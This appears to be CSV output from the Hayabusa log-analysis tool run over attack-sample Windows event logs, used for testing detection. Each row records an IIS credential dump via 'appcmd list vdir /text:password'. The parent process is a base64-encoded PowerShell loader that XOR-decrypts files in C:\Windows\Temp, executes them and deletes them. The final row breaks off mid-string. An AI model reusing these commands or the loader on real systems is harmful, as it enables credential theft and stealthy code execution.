2019-05-27 10:29:19.964 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.034 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.124 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir ""Description: Cannot read configuration file due to insufficient permissions"" /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.204 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.305 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir /text:password  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx
2019-05-27 10:29:20.435 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe""  list vdir "". )"" /text:userName  :  Path: C:\Windows\System32\inetsrv\appcmd.exe  :  User: IIS APPPOOL\DefaultAppPool  :  Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe""  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAO